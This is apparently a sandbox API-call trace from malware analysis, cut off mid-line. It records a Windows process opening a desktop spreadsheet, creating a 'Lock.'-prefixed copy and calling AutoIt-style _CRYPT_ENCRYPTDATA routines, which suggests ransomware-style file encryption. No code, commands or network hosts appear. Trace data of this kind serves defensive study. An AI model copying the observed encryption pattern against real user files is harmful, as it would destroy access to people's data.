[0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0212.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0212.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0212.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0212.612] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/xwkMqwHw2FNJUh0.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\xwkmqwhw2fnjuh0.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0212.612] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.613] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0212.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0212.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0212.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0212.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.614] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0212.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0212.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0212.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0212.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.615] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.xwkMqwHw2FNJUh0.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.xwkmqwhw2fnjuh0.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0212.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0212.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0212.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0212.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0212.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0212.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0212.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0212.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0212.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0212.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0212.622] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.622] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x1893, lpOverlapped=0x0) returned 1 [0212.625] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0212.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0212.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0212.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1893) returned 0x2f24018 [0212.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0212.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0212.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0212.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1893) returned 0x2f258b8 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0212.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0212.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1893) returned 0x2f24018 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0212.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0212.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0212.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0212.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0212.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0212.637] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0212.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0212.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0212.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1893) returned 0x2f24018 [0212.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0212.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1893) returned 0x2f27158 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0212.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0212.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.640] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0212.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0212.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.641] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0212.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 